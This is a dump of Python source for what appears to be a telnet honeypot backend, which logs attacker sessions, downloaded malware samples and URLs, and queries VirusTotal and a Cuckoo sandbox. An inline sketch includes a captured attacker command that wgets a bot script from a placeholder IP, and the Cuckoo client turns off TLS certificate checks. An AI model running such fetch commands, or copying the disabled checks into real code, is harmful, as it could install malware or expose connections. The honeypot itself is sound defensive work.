if min_sim < 0.9:
conn.network.malware = min_conn.network.malware
else:
conn.network.malware = Malware()
conn.network.malware.name = random.choice(ANIMAL_NAMES)
self.session.add(conn.network.malware)
self.session.flush()
# Update network number of first connections
if len(previous_conns) == 0 and conn.network_id != None:
conn.network.nb_firstconns += 1
return conn.json(depth=1)
@db_wrapper
def create_network(self):
net = Network()
self.session.add(net)
self.session.flush()
return net
def create_url_sample(self, f):
url = self.session.query(Url).filter(Url.url==f["url"]).first()
if url == None:
url_ip = None
url_asn = None
url_country = None
if self.do_ip_to_asn_resolution:
url_ip, url_range = self.get_url_info(f["url"])
if url_range:
url_asn = url_range.asn_id
url_country = url_range.country
url = Url(url=f["url"], date=f["date"], ip=url_ip, asn_id=url_asn, country=url_country)
self.session.add(url)
if f["sha256"] != None:
sample = self.session.query(Sample).filter(Sample.sha256 == f["sha256"]).first()
if sample == None:
result = None
try:
if self.vt != None:
vtobj = self.vt.query_hash_sha256(f["sha256"])
if vtobj:
result = str(vtobj["positives"]) + "/" + str(vtobj["total"]) + " " + self.vt.get_best_result(vtobj)
except:
pass
sample = Sample(sha256=f["sha256"], name=f["name"], length=f["length"],
date=f["date"], info=f["info"], result=result)
self.session.add(sample)
if sample.network_id != None and url.network_id == None:
url.network_id = sample.network_id
if sample.network_id == None and url.network_id != None:
sample.network_id = url.network_id
else:
sample = None
url.sample = sample
return sample, url
@db_wrapper
def put_sample(self, data):
sha256 = hashlib.sha256(data).hexdigest()
self.db.put_sample_data(sha256, data)
if config.get("cuckoo_enabled"):
self.cuckoo.upload(os.path.join(config.get("sample_dir"), sha256), sha256)
elif config.get("submit_to_vt"):
self.vt.upload_file(os.path.join(config.get("sample_dir"), sha256), sha256)
@db_wrapper
def update_vt_result(self, sample_sha):
sample = self.session.query(Sample).filter(Sample.sha256 == sample_sha).first()
if sample:
vtobj = self.vt.query_hash_sha256(sample_sha)
if vtobj:
sample.result = str(vtobj["positives"]) + "/" + str(vtobj["total"]) + " " + self.vt.get_best_result(vtobj)
return sample.json(depth=1)
return None
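The tag-matching step above evaluates each tag's stored `code` expression against the connection's JSON via simpleeval's `simple_eval`. As a stdlib-only sketch of the same idea, the hypothetical `match_tag` below stands in for `simple_eval` using a builtins-stripped `eval` (the real library does safer expression parsing):

```python
def match_tag(code, names):
    # Hypothetical stand-in for simpleeval.simple_eval: evaluate a small
    # boolean expression against connection attributes, with builtins
    # removed so the expression cannot call arbitrary functions.
    return eval(code, {"__builtins__": {}}, dict(names)) == True

conn = {"user": "root", "password": "12345",
        "text_combined": "wget http://198.51.100.1/bot.sh"}
assert match_tag("user == 'root'", conn)
assert not match_tag("'busybox' in text_combined", conn)
```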
================================================
FILE: backend/cuckoo.py
================================================
import json
import os
try:
from urllib.parse import urlparse, urljoin
except ImportError:
from urlparse import urlparse, urljoin
import requests
from requests.auth import HTTPBasicAuth
from util.config import config
try:
import urllib3
urllib3.disable_warnings()
except (AttributeError, ImportError):
pass
class Cuckoo():
def __init__(self, config):
self.url_base = config.get("cuckoo_url_base")
self.api_user = config.get("cuckoo_user")
self.api_passwd = config.get("cuckoo_passwd")
self.cuckoo_force = config.get("cuckoo_force")
def upload(self, path, name):
if self.cuckoo_force or self.cuckoo_check_if_dup(os.path.basename(path)) is False:
print("Sending file to Cuckoo")
self.postfile(path, name)
def cuckoo_check_if_dup(self, sha256):
"""
Check if file already was analyzed by cuckoo
"""
try:
print("Looking for tasks for: {}".format(sha256))
res = requests.get(urljoin(self.url_base, "/files/view/sha256/{}".format(sha256)),
verify=False,
auth=HTTPBasicAuth(self.api_user,self.api_passwd),
timeout=60)
if res and res.ok and res.status_code == 200:
print("Sample found in Sandbox, with ID: {}".format(res.json().get("sample", {}).get("id", 0)))
return True
else:
return False
except Exception as e:
print(e)
return False
def postfile(self, artifact, fileName):
"""
Send a file to Cuckoo
"""
files = {"file": (fileName, open(artifact, "rb").read())}
try:
res = requests.post(urljoin(self.url_base, "tasks/create/file").encode("utf-8"), files=files, auth=HTTPBasicAuth(
self.api_user,
self.api_passwd
),
verify=False)
if res and res.ok:
print("Cuckoo Request: {}, Task created with ID: {}".format(res.status_code, res.json()["task_id"]))
else:
print("Cuckoo Request failed: {}".format(res.status_code))
except Exception as e:
print("Cuckoo Request failed: {}".format(e))
return
def posturl(self, scanUrl):
"""
Send a URL to Cuckoo
"""
data = {"url": scanUrl}
try:
res = requests.post(urljoin(self.url_base, "tasks/create/url").encode("utf-8"), data=data, auth=HTTPBasicAuth(
self.api_user,
self.api_passwd
),
verify=False)
if res and res.ok:
print("Cuckoo Request: {}, Task created with ID: {}".format(res.status_code, res.json()["task_id"]))
else:
print("Cuckoo Request failed: {}".format(res.status_code))
except Exception as e:
print("Cuckoo Request failed: {}".format(e))
return
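Note that the two endpoints above are joined differently: `cuckoo_check_if_dup` uses a path with a leading `/`, which makes `urljoin` discard any path component of `url_base`, while `postfile` uses a relative path. A quick illustration with a hypothetical base URL:

```python
from urllib.parse import urljoin  # py2: from urlparse import urljoin

base = "http://cuckoo.example:8090/api/"  # hypothetical cuckoo_url_base

# A relative path is appended below the base path ...
assert urljoin(base, "tasks/create/file") == \
    "http://cuckoo.example:8090/api/tasks/create/file"
# ... while a leading "/" replaces the base path entirely.
assert urljoin(base, "/files/view/sha256/abc") == \
    "http://cuckoo.example:8090/files/view/sha256/abc"
```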
================================================
FILE: backend/db.py
================================================
import time
import json
import sqlalchemy
import random
from decorator import decorator
from sqlalchemy import Table, Column, BigInteger, Integer, Float, String, MetaData, ForeignKey, Text, Index
from sqlalchemy.sql import select, join, insert, text
from sqlalchemy.orm import relationship, sessionmaker, scoped_session
from sqlalchemy.pool import QueuePool
from sqlalchemy.ext.declarative import declarative_base
from util.config import config
is_sqlite = "sqlite://" in config.get("sql")
print("Creating/Connecting to DB")
@decorator
def db_wrapper(func, *args, **kwargs):
self = args[0]
if self.session:
return func(*args, **kwargs)
else:
self.db = get_db()
self.session = self.db.sess
try:
result = func(*args, **kwargs)
self.session.commit()
self.session.flush()
return result
finally:
self.db.end()
self.db = None
self.session = None
def now():
return int(time.time())
def filter_ascii(string):
if string == None:
string = ""
string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in "\r\n ")
return string
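`filter_ascii` keeps printable ASCII (codes 33 to 127) plus carriage return, newline, and space, dropping control bytes and anything non-ASCII. A standalone copy of the helper for a quick check:

```python
def filter_ascii(string):
    # Same logic as the helper above: keep printable ASCII (33..127)
    # plus carriage return, newline, and space.
    if string is None:
        string = ""
    return ''.join(char for char in string
                   if 32 < ord(char) < 128 or char in "\r\n ")

assert filter_ascii(None) == ""
assert filter_ascii("ls\x00 -la\r\n\x1b[0m") == "ls -la\r\n[0m"
```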
Base = declarative_base()
# n to m relation connection <-> url
conns_urls = Table('conns_urls', Base.metadata,
Column('id_conn', None, ForeignKey('conns.id'), primary_key=True, index=True),
Column('id_url', None, ForeignKey('urls.id'), primary_key=True, index=True),
)
# n to m relation connection <-> tag
conns_tags = Table('conns_tags', Base.metadata,
Column('id_conn', None, ForeignKey('conns.id'), primary_key=True, index=True),
Column('id_tag', None, ForeignKey('tags.id'), primary_key=True, index=True),
)
# n to m relationship connection <-> connection (associates)
conns_conns = Table('conns_assocs', Base.metadata,
Column('id_first', None, ForeignKey('conns.id'), primary_key=True, index=True),
Column('id_last', None, ForeignKey('conns.id'), primary_key=True, index=True),
)
class IPRange(Base):
__tablename__ = "ipranges"
ip_min = Column("ip_min", BigInteger, primary_key=True)
ip_max = Column("ip_max", BigInteger, primary_key=True)
cidr = Column("cidr", String(20), unique=True)
country = Column("country", String(3))
region = Column("region", String(128))
city = Column("city", String(128))
zipcode = Column("zipcode", String(30))
timezone = Column("timezone", String(8))
latitude = Column("latitude", Float)
longitude = Column("longitude", Float)
asn_id = Column('asn', None, ForeignKey('asn.asn'))
asn = relationship("ASN", back_populates="ipranges")
class User(Base):
__tablename__ = 'users'
id = Column('id', Integer, primary_key=True)
username = Column('username', String(32), unique=True, index=True)
password = Column('password', String(64))
connections = relationship("Connection", back_populates="backend_user")
def json(self, depth=0):
return {
"username": self.username
}
class Network(Base):
__tablename__ = 'network'
id = Column('id', Integer, primary_key=True)
samples = relationship("Sample", back_populates="network")
urls = relationship("Url", back_populates="network")
connections = relationship("Connection", back_populates="network")
nb_firstconns = Column('nb_firstconns', Integer, default=0)
malware_id = Column('malware', None, ForeignKey('malware.id'))
malware = relationship("Malware", back_populates="networks")
def json(self, depth=0):
return {
"id": self.id,
"samples": len(self.samples) if depth == 0 else map(lambda i: i.sha256, self.samples),
"urls": len(self.urls) if depth == 0 else map(lambda i: i.url, self.urls),
"connections": len(self.connections) if depth == 0 else map(lambda i: i.id, self.connections),
"firstconns": self.nb_firstconns,
"malware": self.malware.json(depth=0)
}
class Malware(Base):
__tablename__ = 'malware'
id = Column('id', Integer, primary_key=True)
name = Column('name', String(32))
networks = relationship("Network", back_populates="malware")
def json(self, depth=0):
return {
"id": self.id,
"name": self.name,
"networks": map(lambda i: i.id if depth == 0 else i.json(), self.networks)
}
class ASN(Base):
__tablename__ = 'asn'
asn = Column('asn', BigInteger, primary_key=True)
name = Column('name', String(64))
reg = Column('reg', String(32))
country = Column('country', String(3))
urls = relationship("Url", back_populates="asn")
connections = relationship("Connection", back_populates="asn")
ipranges = relationship("IPRange", back_populates="asn")
def json(self, depth=0):
return {
"asn": self.asn,
"name": self.name,
"reg": self.reg,
"country": self.country,
"urls": map(lambda url : url.url if depth == 0
else url.json(depth - 1), self.urls[:10]),
"connections": None if depth == 0 else map(lambda connection :
connection.json(depth - 1), self.connections[:10])
}
class Sample(Base):
__tablename__ = 'samples'
id = Column('id', Integer, primary_key=True)
sha256 = Column('sha256', String(64), unique=True, index=True)
date = Column('date', Integer)
name = Column('name', String(32))
file = Column('file', String(512))
length = Column('length', Integer)
result = Column('result', String(32))
info = Column('info', Text())
urls = relationship("Url", back_populates="sample")
network_id = Column('network', None, ForeignKey('network.id'), index=True)
network = relationship("Network", back_populates="samples")
def json(self, depth=0):
return {
"sha256": self.sha256,
"date": self.date,
"name": self.name,
"length": self.length,
"result": self.result,
"info": self.info,
"urls": len(self.urls) if depth == 0 else map(lambda url :
url.json(depth - 1), self.urls),
"network": self.network_id if depth == 0 else self.network.json()
}
class Connection(Base):
__tablename__ = 'conns'
id = Column('id', Integer, primary_key=True)
ip = Column('ip', String(16))
date = Column('date', Integer, index=True)
user = Column('user', String(16))
password = Column('pass', String(16))
connhash = Column('connhash', String(256), index=True)
stream = Column('text_combined', Text())
asn_id = Column('asn', None, ForeignKey('asn.asn'), index=True)
asn = relationship("ASN", back_populates="connections")
backend_user_id = Column('backend_user_id', None, ForeignKey('users.id'), index=True)
backend_user = relationship("User", back_populates="connections")
ipblock = Column('ipblock', String(32))
country = Column('country', String(3))
city = Column('city', String(32))
lon = Column('lon', Float)
lat = Column('lat', Float)
urls = relationship("Url", secondary=conns_urls, back_populates="connections")
tags = relationship("Tag", secondary=conns_tags, back_populates="connections")
network_id = Column('network', None, ForeignKey('network.id'), index=True)
network = relationship("Network", back_populates="connections")
conns_before = relationship("Connection", secondary=conns_conns,
back_populates="conns_after",
primaryjoin=(conns_conns.c.id_last==id),
secondaryjoin=(conns_conns.c.id_first==id))
conns_after = relationship("Connection", secondary=conns_conns,
back_populates="conns_before",
primaryjoin=(conns_conns.c.id_first==id),
secondaryjoin=(conns_conns.c.id_last==id))
def json(self, depth=0):
stream = None
if depth > 0:
try:
stream = json.loads(self.stream)
except:
try:
# Fix Truncated JSON ...
s = self.stream[:self.stream.rfind("}")] + "}]"
stream = json.loads(s)
except:
stream = []
return {
"id": self.id,
"ip": self.ip,
"date": self.date,
"user": self.user,
"password": self.password,
"connhash": self.connhash,
"stream": stream,
"network": self.network_id if depth == 0 else (self.network.json() if self.network != None else None),
"asn": None if self.asn == None else self.asn.json(0),
"ipblock": self.ipblock,
"country": self.country,
"city": self.city,
"longitude": self.lon,
"latitude": self.lat,
"conns_before": map(lambda conn : conn.id if depth == 0
else conn.json(depth - 1), self.conns_before),
"conns_after": map(lambda conn : conn.id if depth == 0
else conn.json(depth - 1), self.conns_after),
"backend_user": self.backend_user.username,
"urls": len(self.urls) if depth == 0 else map(lambda url :
url.json(depth - 1), self.urls),
"tags": len(self.tags) if depth == 0 else map(lambda tag :
tag.json(depth - 1), self.tags),
}
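The fallback in `json()` above repairs a truncated `stream` column by cutting at the last complete object and re-closing the JSON array. The same repair, isolated into a standalone sketch:

```python
import json

def repair_stream(raw):
    # Mirrors the fallback in Connection.json: on a parse error, truncate
    # at the last complete object and close the JSON array again.
    try:
        return json.loads(raw)
    except ValueError:
        try:
            return json.loads(raw[:raw.rfind("}")] + "}]")
        except ValueError:
            return []

truncated = '[{"in": true, "data": "ls"}, {"in": false, "da'
assert repair_stream(truncated) == [{"in": True, "data": "ls"}]
```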
Index('idx_conn_user_pwd', Connection.user, Connection.password)
class Url(Base):
__tablename__ = 'urls'
id = Column('id', Integer, primary_key=True)
url = Column('url', String(256), unique=True, index=True)
date = Column('date', Integer)
sample_id = Column('sample', None, ForeignKey('samples.id'), index=True)
sample = relationship("Sample", back_populates="urls")
network_id = Column('network', None, ForeignKey('network.id'), index=True)
network = relationship("Network", back_populates="urls")
connections = relationship("Connection", secondary=conns_urls, back_populates="urls")
asn_id = Column('asn', None, ForeignKey('asn.asn'))
asn = relationship("ASN", back_populates="urls")
ip = Column('ip', String(32))
country = Column('country', String(3))
def json(self, depth=0):
return {
"url": self.url,
"date": self.date,
"sample": None if self.sample == None else
(self.sample.sha256 if depth == 0
else self.sample.json(depth - 1)),
"connections": len(self.connections) if depth == 0 else map(lambda connection :
connection.json(depth - 1), self.connections),
"asn": None if self.asn == None else
(self.asn.asn if depth == 0
else self.asn.json(depth - 1)),
"ip": self.ip,
"country": self.country,
"network": self.network_id if depth == 0 else self.network.json()
}
class Tag(Base):
__tablename__ = 'tags'
id = Column('id', Integer, primary_key=True)
name = Column('name', String(32), unique=True)
code = Column('code', String(256))
connections = relationship("Connection", secondary=conns_tags, back_populates="tags")
def json(self, depth=0):
return {
"name": self.name,
"code": self.code,
"connections": None if depth == 0 else map(lambda connection :
connection.json(depth - 1), self.connections)
}
samples = Sample.__table__
conns = Connection.__table__
urls = Url.__table__
tags = Tag.__table__
eng = None
if is_sqlite:
eng = sqlalchemy.create_engine(config.get("sql"),
poolclass=QueuePool,
pool_size=1,
max_overflow=20,
connect_args={'check_same_thread': False})
else:
eng = sqlalchemy.create_engine(config.get("sql"),
poolclass=QueuePool,
pool_size=config.get("max_db_conn"),
max_overflow=config.get("max_db_conn"))
Base.metadata.create_all(eng)
def get_db():
return DB(scoped_session(sessionmaker(bind=eng)))
def delete_everything():
spare_tables = ["users", "asn", "ipranges"]
eng.execute("SET FOREIGN_KEY_CHECKS=0;")
for table in Base.metadata.tables.keys():
if table in spare_tables:
continue
sql_text = "DELETE FROM " + table + ";"
print(sql_text)
eng.execute(sql_text)
eng.execute("SET FOREIGN_KEY_CHECKS=1;")
class DB:
def __init__(self, sess):
self.sample_dir = config.get("sample_dir")
self.limit_samples = 32
self.limit_urls = 32
self.limit_conns = 32
self.sess = sess
def end(self):
try:
self.sess.commit()
finally:
self.sess.remove()
# INPUT
def put_sample_data(self, sha256, data):
file = self.sample_dir + "/" + sha256
fp = open(file, "wb")
fp.write(data)
fp.close()
self.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(file=file))
def put_sample_result(self, sha256, result):
self.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(result=result))
def put_url(self, url, date, url_ip, url_asn, url_country):
ex_url = self.sess.execute(urls.select().where(urls.c.url == url)).fetchone()
if ex_url:
return ex_url["id"]
else:
return self.sess.execute(urls.insert().values(url=url, date=date, sample=None, ip=url_ip, asn=url_asn, country=url_country)).inserted_primary_key[0]
def put_conn(self, ip, user, password, date, text_combined, asn, block, country, connhash):
return self.sess.execute(conns.insert().values((None, ip, date, user, password, text_combined, asn, block, country))).inserted_primary_key[0]
def put_sample(self, sha256, name, length, date, info, result):
ex_sample = self.get_sample(sha256).fetchone()
if ex_sample:
return ex_sample["id"]
else:
return self.sess.execute(samples.insert().values(sha256=sha256, date=date, name=name, length=length, result=result, info=info)).inserted_primary_key[0]
def link_conn_url(self, id_conn, id_url):
self.sess.execute(conns_urls.insert().values(id_conn=id_conn, id_url=id_url))
def link_url_sample(self, id_url, id_sample):
self.sess.execute(urls.update().where(urls.c.id == id_url).values(sample=id_sample))
def link_conn_tag(self, id_conn, id_tag):
self.sess.execute(conns_tags.insert().values(id_conn=id_conn, id_tag=id_tag))
# OUTPUT
def get_conn_count(self):
q = """
SELECT COUNT(id) as count FROM conns
"""
return self.sess.execute(text(q)).fetchone()["count"]
def get_sample_count(self):
q = """
SELECT COUNT(id) as count FROM samples
"""
return self.sess.execute(text(q)).fetchone()["count"]
def get_url_count(self):
q = """
SELECT COUNT(id) as count FROM urls
"""
return self.sess.execute(text(q)).fetchone()["count"]
def search_sample(self, q):
q = "%" + q + "%"
return self.sess.execute(samples.select().where(samples.c.name.like(q) | samples.c.result.like(q)).limit(self.limit_samples))
def search_url(self, q):
search = "%" + q + "%"
q = """
SELECT urls.url as url, urls.date as date, samples.sha256 as sample
FROM urls
LEFT JOIN samples on samples.id = urls.sample
WHERE urls.url LIKE :search
LIMIT :limit
"""
return self.sess.execute(text(q), {"search": search, "limit": self.limit_urls})
def get_url(self, url):
q = """
SELECT urls.url as url, urls.date as date, samples.sha256 as sample, urls.id as id
FROM urls
LEFT JOIN samples on samples.id = urls.sample
WHERE urls.url = :search
"""
return self.sess.execute(text(q), {"search": url})
def get_url_conns(self, id_url):
q = """
SELECT conns.ip as ip, conns.user as user, conns.pass as password, conns.date as date
FROM conns_urls
LEFT JOIN conns on conns.id = conns_urls.id_conn
WHERE conns_urls.id_url = :id_url
ORDER BY conns.date DESC
LIMIT :limit
"""
return self.sess.execute(text(q), {"id_url": id_url, "limit" : self.limit_samples})
def get_url_conns_count(self, id_url):
q = """
SELECT COUNT(conns_urls.id_conn) as count
FROM conns_urls
WHERE conns_urls.id_url = :id_url
"""
return self.sess.execute(text(q), {"id_url": id_url})
def get_sample_stats(self, date_from = 0):
q = """
select
samples.name as name, samples.sha256 as sha256,
COUNT(samples.id) as count, MAX(conns.date) as lastseen,
samples.length as length, samples.result as result
from conns_urls
INNER JOIN conns on conns_urls.id_conn = conns.id
INNER JOIN urls on conns_urls.id_url = urls.id
INNER JOIN samples on urls.sample = samples.id
WHERE conns.date > :from
GROUP BY samples.id
ORDER BY count DESC
LIMIT :limit"""
return self.sess.execute(text(q), {"from": date_from, "limit": self.limit_samples})
def history_global(self, fromdate, todate, delta=3600):
q = """
SELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour
FROM conns
WHERE conns.date >= :from
AND conns.date <= :to
GROUP BY hour
"""
return self.sess.execute(text(q), {"from": fromdate, "to": todate, "delta": delta})
def history_sample(self, id_sample, fromdate, todate, delta=3600):
q = """
SELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour
FROM conns
INNER JOIN conns_urls on conns_urls.id_conn = conns.id
INNER JOIN urls on conns_urls.id_url = urls.id
WHERE urls.sample = :id_sample
AND conns.date >= :from
AND conns.date <= :to
GROUP BY hour
ORDER BY hour ASC
"""
return self.sess.execute(text(q), {"from": fromdate, "to": todate, "delta": delta, "id_sample" : id_sample})
def get_samples(self):
return self.sess.execute(samples.select().limit(self.limit_samples))
def get_sample(self, sha256):
return self.sess.execute(samples.select().where(samples.c.sha256 == sha256))
print("DB Setup done")
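The history queries above bucket connections into fixed time slots with `:delta * cast(conns.date / :delta as integer)`. The grouping can be reproduced against an in-memory SQLite database:

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE conns (id INTEGER PRIMARY KEY, date INTEGER)")
con.executemany("INSERT INTO conns (date) VALUES (?)",
                [(3600,), (3700,), (7300,)])
# Same bucketing expression as history_global: each date is floored
# to a multiple of :delta (one hour here).
rows = con.execute(
    "SELECT COUNT(id), :delta * CAST(date / :delta AS INTEGER) AS hour "
    "FROM conns GROUP BY hour ORDER BY hour",
    {"delta": 3600}).fetchall()
assert rows == [(2, 3600), (1, 7200)]
```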
================================================
FILE: backend/ipdb/.gitignore
================================================
*.CSV
*.csv
================================================
FILE: backend/ipdb/__init__.py
================================================
================================================
FILE: backend/ipdb/ipdb.py
================================================
import csv
import ipaddress
import struct
import os
def ipstr2int(ip):
ip = unicode(ip)
ip = ipaddress.IPv4Address(ip).packed
ip = struct.unpack("!I", ip)[0]
return ip
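`ipstr2int` packs a dotted-quad address into a 32-bit big-endian integer. Setting aside the Python-2-only `unicode()` call, the same conversion in portable form:

```python
import ipaddress
import struct

def ip_to_int(ip):
    # Pack the address to 4 network-order bytes, then unpack them as one
    # unsigned 32-bit integer (the same steps as ipstr2int above).
    packed = ipaddress.IPv4Address(ip).packed
    return struct.unpack("!I", packed)[0]

assert ip_to_int("1.2.3.4") == 16909060      # 0x01020304
assert ip_to_int("255.255.255.255") == 2 ** 32 - 1
```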
class Entry:
def __init__(self, start, end, value):
self.start = int(start)
self.end = int(end)
self.value = value
class IPTable:
def __init__(self, fname):
self.tzlist = []
iplocfile = os.path.join(os.path.dirname(__file__), fname)
with open(iplocfile, "rb") as ipcsv:
reader = csv.reader(ipcsv, delimiter=',', quotechar='"')
for row in reader:
e = Entry(row[0], row[1], row)
self.tzlist.append(e)
def find_i(self, ip, start, end):
if end - start < 100:
for i in range(start, end + 1):
obj = self.tzlist[i]
if obj.start <= ip and ip <= obj.end:
return obj.value
return None
else:
mid = start + (end - start) // 2
val = self.tzlist[mid].start
if ip < val: return self.find_i(ip, start, mid)
elif ip > val: return self.find_i(ip, mid, end)
else: return self.tzlist[mid].value
def __iter__(self):
return self.tzlist.__iter__()
def find_int(self, ip):
return self.find_i(ip, 0, len(self.tzlist) - 1)
def find(self, ip):
return self.find_i(ipstr2int(ip), 0, len(self.tzlist) - 1)
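`find_i` narrows the sorted range list by binary search and switches to a linear scan once fewer than 100 entries remain. A minimal standalone version of that lookup (scanning through `end` inclusive):

```python
def find_range(ranges, ip, start=None, end=None):
    # ranges: sorted list of (start, end, value) tuples, as in IPTable.
    if start is None:
        start, end = 0, len(ranges) - 1
    if end - start < 100:
        # Small window: linear scan for the enclosing range.
        for lo, hi, value in ranges[start:end + 1]:
            if lo <= ip <= hi:
                return value
        return None
    mid = start + (end - start) // 2
    if ip < ranges[mid][0]:
        return find_range(ranges, ip, start, mid)
    return find_range(ranges, ip, mid, end)

ranges = [(0, 9, "a"), (10, 19, "b"), (20, 29, "c")]
assert find_range(ranges, 15) == "b"
assert find_range(ranges, 99) is None
```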
def get_geo():
return IPTable("IP2LOCATION-LITE-DB11.CSV")
def get_asn():
return IPTable("IP2LOCATION-LITE-ASN.CSV")
def get_geo_iter():
iplocfile = os.path.join(os.path.dirname(__file__), "IP2LOCATION-LITE-DB11.CSV")
fp = open(iplocfile, "rb")
return csv.reader(fp, delimiter=',', quotechar='"')
class IPDB:
def __init__(self):
self.geo = get_geo()
self.asn = get_asn()
def find(self, ip):
geo = self.geo.find(ip)
asn = self.asn.find(ip)
if geo != None and asn != None:
r = {}
r["asn"] = int(asn[3])
r["ipblock"] = asn[2]
r["country"] = geo[2]
r["region"] = geo[4]
r["city"] = geo[5]
r["zip"] = geo[8]
r["lon"] = float(geo[7])
r["lat"] = float(geo[6])
r["timezone"] = geo[9]
return r
else:
return None
if __name__ == "__main__":
db = IPDB()
print(db.find("217.81.94.77"))
================================================
FILE: backend/virustotal.py
================================================
import requests
import time
import db
import Queue
from util.config import config
class QuotaExceededError(Exception):
def __str__(self):
return "QuotaExceededError: Virustotal API Quota Exceeded"
class Virustotal:
def __init__(self, key):
self.api_key = key
self.url = "https://www.virustotal.com/vtapi/v2/"
self.user_agent = "Telnet Honeybot Backend"
self.engines = ["DrWeb", "Kaspersky", "ESET-NOD32"]
self.queue = Queue.Queue()
self.timeout = 0
def req(self, method, url, files=None, params=None, headers=None):
print "VT " + url
r = None
if method == "GET":
r = requests.get(url, files=files, params=params, headers=headers)
elif method == "POST":
r = requests.post(url, files=files, params=params, headers=headers)
else:
raise ValueError("Unknown Method: " + str(method))
if r.status_code == 204:
raise QuotaExceededError()
else:
return r
def upload_file(self, f, fname):
fp = open(f, 'rb')
params = {'apikey': self.api_key}
files = {'file': (fname, fp)}
headers = { "User-Agent" : self.user_agent }
res = self.req("POST", self.url + 'file/scan', files=files, params=params, headers=headers)
json = res.json()
fp.close()
if json["response_code"] == 1:
return json
else:
return None
def query_hash_sha256(self, h):
params = { 'apikey': self.api_key, 'resource': h }
headers = { "User-Agent" : self.user_agent }
res = self.req("GET", self.url + "file/report", params=params, headers=headers)
json = res.json()
if json["response_code"] == 1:
return json
else:
return None
def put_comment(self, obj, msg):
res = None
params = { 'apikey': self.api_key, 'resource': obj, "comment": msg }
headers = { "User-Agent" : self.user_agent }
res = self.req("GET", self.url + "comments/put", params=params, headers=headers)
json = res.json()
if json["response_code"] == 1:
return json
else:
return None
def get_best_result(self, r):
if r["scans"]:
for e in self.engines:
if r["scans"][e] and r["scans"][e]["detected"]:
return r["scans"][e]["result"]
for e,x in r["scans"].iteritems():
if x["detected"]:
return x["result"]
return None
else:
return None
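`get_best_result` prefers a few curated engines and otherwise falls back to the first detection in the report. A standalone sketch of that selection, using `.get()` so a missing engine cannot raise `KeyError`:

```python
ENGINES = ["DrWeb", "Kaspersky", "ESET-NOD32"]

def best_result(report):
    # Prefer the curated engines above, then fall back to any detection.
    scans = report.get("scans") or {}
    for engine in ENGINES:
        if scans.get(engine, {}).get("detected"):
            return scans[engine]["result"]
    for scan in scans.values():
        if scan.get("detected"):
            return scan["result"]
    return None

report = {"scans": {
    "DrWeb": {"detected": False},
    "Kaspersky": {"detected": True, "result": "Backdoor.Linux.Mirai.b"},
}}
assert best_result(report) == "Backdoor.Linux.Mirai.b"
assert best_result({"scans": {}}) is None
```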
================================================
FILE: backend/virustotal_fill_db.py
================================================
import os
from util.dbg import dbg
from virustotal import Virustotal
from sampledb import Sampledb
vt = Virustotal()
sdb = Sampledb()
# Engines on vt providing good results
engines = ["DrWeb", "Kaspersky", "ESET-NOD32"]
def getName(r):
if r["scans"]:
for e in engines:
if r["scans"][e] and r["scans"][e]["detected"]:
return r["scans"][e]["result"]
for e,x in r["scans"].iteritems():
if x["detected"]:
return x["result"]
return None
else:
return None
#sdb.sql.execute('ALTER TABLE samples ADD COLUMN result TEXT')
#sdb.sql.commit()
for row in sdb.sql.execute('SELECT id, sha256 FROM samples WHERE result is NULL'):
r = vt.query_hash_sha256(row[1])
res = str(getName(r))
print(row[1] + ": " + res)
sdb.sql.execute('UPDATE samples SET result = ? WHERE id = ?', (res, row[0]))
sdb.sql.commit()
================================================
FILE: backend/webcontroller.py
================================================
import os
import hashlib
import traceback
import struct
import json
import time
import math
import additionalinfo
import ipdb.ipdb
from sqlalchemy import desc, func, and_, or_, not_
from functools import wraps
from simpleeval import simple_eval
from argon2 import argon2_hash
from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper, conns_conns
from virustotal import Virustotal
from cuckoo import Cuckoo
from util.dbg import dbg
from util.config import config
from difflib import ndiff
class WebController:
def __init__(self):
self.session = None
@db_wrapper
def get_connection(self, id):
connection = self.session.query(Connection).filter(Connection.id == id).first()
if connection:
return connection.json(depth=1)
else:
return None
@db_wrapper
def get_connections(self, filter_obj={}, older_than=None):
query = self.session.query(Connection).filter_by(**filter_obj)
if older_than:
query = query.filter(Connection.date < older_than)
query = query.order_by(desc(Connection.date))
connections = query.limit(32).all()
return map(lambda connection : connection.json(), connections)
@db_wrapper
def get_connections_fast(self):
conns = self.session.query(Connection).all()
clist = []
for conn in conns:
clist.append({
"id": conn.id,
"ip": conn.ip,
"conns_before": map(lambda c: c.id, conn.conns_before),
"conns_after": map(lambda c: c.id, conn.conns_after)
})
return clist
##
@db_wrapper
def get_networks(self):
networks = self.session.query(Network).all()
ret = []
for network in networks:
if len(network.samples) > 0 and network.nb_firstconns >= 10:
n = network.json(depth = 0)
# ips = set()
# for connection in network.connections:
# ips.add(connection.ip)
# n["ips"] = list(ips)
ret.append(n)
return ret
@db_wrapper
def get_network(self, net_id):
network = self.session.query(Network).filter(Network.id == net_id).first()
ret = network.json()
honeypots = {}
initialconnections = filter(lambda connection: len(connection.conns_before) == 0, network.connections)
ret["connectiontimes"] = map(lambda connection: connection.date, initialconnections)
has_infected = set([])
for connection in network.connections:
if connection.backend_user.username in honeypots:
honeypots[connection.backend_user.username] += 1
else:
honeypots[connection.backend_user.username] = 1
for connection_before in connection.conns_before:
if connection.ip != connection_before.ip:
has_infected.add(("i:" + connection.ip, "i:" + connection_before.ip))
for url in connection.urls:
has_infected.add(("u:" + url.url, "i:" + connection.ip))
if url.sample:
has_infected.add(("s:" + url.sample.sha256, "u:" + url.url))
ret["has_infected"] = list(has_infected)
ret["honeypots"] = honeypots
return ret
@db_wrapper
def get_network_history(self, not_before, not_after, network_id):
granularity = float(3600 * 24) # 1 day
timespan = float(not_after - not_before)
if timespan < 3600 * 24 * 2:
granularity = float(3600) * 2
conns = self.session.query(Connection.date)
conns = conns.filter(Connection.network_id == network_id)
conns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after))
# Filter out subsequent connections
conns = conns.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last)
conns = conns.filter(conns_conns.c.id_last == None)
ret = [0] * int(math.ceil(timespan / granularity))
for i in range(len(ret)):
ret[i] = [ not_before + i * granularity, 0 ]
for date in conns.all():
i = int((date[0] - not_before) / granularity)
ret[i][1] += 1
